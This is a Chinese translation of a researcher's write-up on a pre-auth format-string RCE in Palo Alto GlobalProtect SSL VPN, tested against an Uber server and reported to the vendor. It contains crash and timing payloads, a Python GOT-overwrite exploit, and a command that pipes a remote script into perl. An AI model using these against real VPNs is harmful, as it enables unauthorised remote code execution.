百度360必应搜狗淘宝本站头条
python类型转换python计时python异常python进度条python吧
当前位置:网站首页 > 技术资源 > 正文

攻击SSL VPN(一)

off999 2025-03-01 15:08 16 浏览 0 评论

?? 翻译文章,原文: Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study![1]


?


SSL VPN保护公司资产不受Internet的影响,但是SSL VPN本身容易受到攻击怎么办?他们可以访问Internet,值得信赖,可以可靠地保护您访问Intranet的唯一方法。一旦SSL VPN服务器受到威胁,攻击者便可以渗透到您的内网,甚至接管所有连接到SSL VPN服务器的用户!由于其重要性,在过去的几个月中,我们开始对领先的SSL VPN产品的安全性进行新的研究。

我们计划将结果发表在3篇文章中。我们将其作为第一篇,因为我们认为这是一个有趣的故事,非常适合作为我们的Black Hat USA[2]和DEFCON[3]演讲的开胃菜:

?Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!

不用担心剧透,我们的BHUSA/DEFCON演讲中不包括这个故事。

在下面的演示中,我们将提供更多的核心漏洞利用和疯狂的错误链,以侵入您的SSL VPN。从我们如何入侵设备以及我们关注的攻击媒介上来。我们还将演示如何从唯一暴露的HTTPS端口获得root shell,针对服务器的所有者暗中为服务器加武器,以及滥用隐藏功能来接管所有VPN客户端!所以请期待它;)

故事

在本文中,我们想谈一谈Palo Alto SSL VPN上的漏洞。Palo Alto称其SSL VPN产品系列为GlobalProtect。您可以通过302重定向到Web根目录上的 /global-protect/login.esp 轻松识别GlobalPortect服务!

关于该漏洞,我们在Red Team评估服务期间意外发现了该漏洞。起初,我们认为这是一个0Day。但是,我们无法在最新版本的GlobalProtect远程服务器上进行复制。因此,我们开始怀疑这是否是已知漏洞。

我们在Internet上进行了搜索,但找不到任何东西。以前没有公开的RCE漏洞利用[1],也没有任何官方公告包含类似内容,也没有CVE。因此,我们认为这必须是1Day的无声修复!

[1]之前有一些有关Pan-OS管理界面的漏洞,例如CVE-2017-15944[4]和 @_fel1x[5]撰写的出色的Troppers16论文[6],但不幸的是,他们并没有谈论GlobalProtect,并且管理界面仅暴露于局域网端口

Bug

该错误非常简单。这只是一个简单的格式字符串漏洞,无需身份验证!sslmgr是SSL网关,用于处理服务器和客户端之间的SSL握手。该守护程序由Nginx反向代理公开,可以通过路径/sslmgr进行访问

$ curl https://global-protect/sslmgr
        
  
  error
Invalid parameters

在参数提取期间,守护程序搜索字符串scep-profile-name并将其值作为snprintf格式传递以填充缓冲区。这导致了格式字符串攻击。您可以使用 %n 使服务崩溃!

POST /sslmgr HTTP/1.1Host: global-protectContent-Length: 36
?scep-profile-name=%n%n%n%n%n...

影响版本

根据我们的调查,2018年7月之前的所有GlobalProtect都容易受到攻击!这是受影响的版本列表:

?Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19

?Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12

?Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

9.x和7.0.x系列不受此漏洞影响

如何验证这个漏洞

尽管我们知道错误在哪里,但要验证漏洞仍然不容易。该格式字符串没有输出,因此我们无法获得任何地址泄漏来验证错误。崩溃服务绝不是我们的首选[1]。为了避免崩溃,我们需要找到一种方法来优雅地验证漏洞!

通过阅读 snprintf 手册,我们选择%c作为我们的小工具!如果格式前面有数字,例如%9999999c,则 snprintf 在内部重复对应的时间。我们观察到重复次数很大的响应时间,以验证此漏洞!

$ time curl -s -d 'scep-profile-name=%9999999c' https://global-protect/sslmgr >/dev/null
real    0m1.721
suser    0m0.037s
sys     0m0.005s$ 
time curl -s -d 'scep-profile-name=%99999999c' https://global-protect/sslmgr >/dev/nullreal    0m2.051suser    0m0.035ssys     0m0.012s$ time curl -s -d 'scep-profile-name=%999999999c' https://global-protect/sslmgr >/dev/nullreal    0m5.324suser    0m0.021ssys     0m0.018s

如您所见,响应时间随着%c的数量而增加。因此,从时差来看,我们可以轻松识别出易受攻击的SSL VPN!

[1]尽管有一个监视sslmgr守护程序的看门狗,但它仍然无法使服务崩溃!

利用程序

一旦我们可以验证错误,利用就很容易了。为了成功利用二进制文件,我们需要首先确定详细版本。我们可以通过Last-Modified标头来区分,例如8.x版本中的
/global-protect/portal/css/login.css和7.x版本中的/images/logo_pan_158.gif!

$ curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified
Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT

使用指定的版本,我们现在可以编写我们自己的漏洞利用。我们只需将全局偏移表(GOT)上的strlen指针修改为系统的过程链接表(PLT)。这是PoC:

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)

修改完成后,sslmgr成为我们的webshell,我们可以通过以下命令执行命令:

$ curl -d 'scep-profile-name=curl orange.tw/bc.pl | perl -' https://global-protect/sslmgr

我们已经把此Bug报告给了Palo Alto[7]。但是,我们得到以下答复:

你好 Orange:

感谢您的提交。对于外部研究人员向我们报告的安全漏洞,Palo Alto Networks确实遵循协调的漏洞披露。
我们不对在内部找到的CVE物品进行修复。此问题先前已得到解决,但是如果您在当前版本中找到某些内容,
请告知我们。

Kind regards

个案研究

在意识到这不是0Day之后,我们对全球所有Palo Alto SSL VPN进行了调查,以查看是否有大公司在使用易受攻击的GlobalProtect,而Uber就是其中之一!根据我们的调查,Uber在全球拥有大约22台运行GlobalProtect的服务器,这里我们以
vpn.awscorp.uberinternal.com 为例!

从域名来看,我们猜测Uber使用了来自AWS Marketplace的BYOL。在登录页面上,Uber似乎使用的是8.x版本,我们可以从市场概述页面上受支持的版本列表中定位可能的目标版本:

?8.0.3

?8.0.6

?8.0.8

?8.0.9

?8.1.0

最终,我们找到了版本8.0.6,并得到shell!



Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.?Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!

这是一个公平的决定。与Uber交流并向他们的Bug赏金计划报告总是一个美好的时光。我们不太在乎赏金,因为我们喜欢整个研究过程并反馈给安全社区!没有比这更好的了!

References

[1] Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!: https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html

[2] Black Hat USA: https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545

[3] DEFCON: https://www.defcon.org/html/defcon-27/dc-27-speakers.html

[4] CVE-2017-15944: https://www.exploit-db.com/exploits/43342

[5] @_fel1x: https://twitter.com/_fel1x

[6] Troppers16论文:
https://www.troopers.de/events/troopers16/630_attacking_next-generation_firewalls/

[7] Palo Alto: https://securityadvisories.paloaltonetworks.com/Report

相关推荐

Python钩子函数实现事件驱动系统(created钩子函数)

钩子函数(HookFunction)是现代软件开发中一个重要的设计模式,它允许开发者在特定事件发生时自动执行预定义的代码。在Python生态系统中,钩子函数广泛应用于框架开发、插件系统、事件处理和中...

Python函数(python函数题库及答案)

定义和基本内容def函数名(传入参数):函数体return返回值注意:参数、返回值如果不需要,可以省略。函数必须先定义后使用。参数之间使用逗号进行分割,传入的时候,按照顺序传入...

Python技能:Pathlib面向对象操作路径,比os.path更现代!

在Python编程中,文件和目录的操作是日常中不可或缺的一部分。虽然,这么久以来,钢铁老豆也还是习惯性地使用os、shutil模块的函数式API,这两个模块虽然功能强大,但在某些情况下还是显得笨重,不...

使用Python实现智能物流系统优化与路径规划

阅读文章前辛苦您点下“关注”,方便讨论和分享,为了回馈您的支持,我将每日更新优质内容。在现代物流系统中,优化运输路径和提高配送效率是至关重要的。本文将介绍如何使用Python实现智能物流系统的优化与路...

Python if 语句的系统化学习路径(python里的if语句案例)

以下是针对Pythonif语句的系统化学习路径,从零基础到灵活应用分为4个阶段,包含具体练习项目和避坑指南:一、基础认知阶段(1-2天)目标:理解条件判断的逻辑本质核心语法结构if条件:...

[Python] FastAPI基础:Path路径参数用法解析与实例

查询query参数(上一篇)路径path参数(本篇)请求体body参数(下一篇)请求头header参数本篇项目目录结构:1.路径参数路径参数是URL地址的一部分,是必填的。路径参...

Python小案例55- os模块执行文件路径

在Python中,我们可以使用os模块来执行文件路径操作。os模块提供了许多函数,用于处理文件和目录路径。获取当前工作目录(CurrentWorkingDirectory,CWD):使用os....

python:os.path - 常用路径操作模块

应该是所有程序都需要用到的路径操作,不废话,直接开始以下是常用总结,当你想做路径相关时,首先应该想到的是这个模块,并知道这个模块有哪些主要功能,获取、分割、拼接、判断、获取文件属性。1、路径获取2、路...

原来如此:Python居然有6种模块路径搜索方式

点赞、收藏、加关注,下次找我不迷路当我们使用import语句导入模块时,Python是怎么找到这些模块的呢?今天我就带大家深入了解Python的6种模块路径搜索方式。一、Python模块...

每天10分钟,python进阶(25)(python进阶视频)

首先明确学习目标,今天的目标是继续python中实例开发项目--飞机大战今天任务进行面向对象版的飞机大战开发--游戏代码整编目标:完善整串代码,提供完整游戏代码历时25天,首先要看成品,坚持才有收获i...

python 打地鼠小游戏(打地鼠python程序设计说明)

给大家分享一段AI自动生成的代码(在这个游戏中,玩家需要在有限时间内打中尽可能多的出现在地图上的地鼠),由于我现在用的这个电脑没有安装sublime或pycharm等工具,所以还没有测试,有兴趣的朋友...

python线程之十:线程 threading 最终总结

小伙伴们,到今天threading模块彻底讲完。现在全面总结threading模块1、threading模块有自己的方法详细点击【threading模块的方法】threading模块:较低级...

Python信号处理实战:使用signal模块响应系统事件

信号是操作系统用来通知进程发生了某个事件的一种异步通信方式。在Python中,标准库的signal模块提供了处理这些系统信号的机制。信号通常由外部事件触发,例如用户按下Ctrl+C、子进程终止或系统资...

Python多线程:让程序 “多线作战” 的秘密武器

一、什么是多线程?在日常生活中,我们可以一边听音乐一边浏览新闻,这就是“多任务处理”。在Python编程里,多线程同样允许程序同时执行多个任务,从而提升程序的执行效率和响应速度。不过,Python...

用python写游戏之200行代码写个数字华容道

今天来分析一个益智游戏,数字华容道。当初对这个游戏颇有印象还是在最强大脑节目上面,何猷君以几十秒就完成了这个游戏。前几天写2048的时候,又想起了这个游戏,想着来研究一下。游戏玩法用尽量少的步数,尽量...

取消回复欢迎 发表评论:

一周热门
最近发表
标签列表
Copyright Your WebSite.Some Rights Reserved.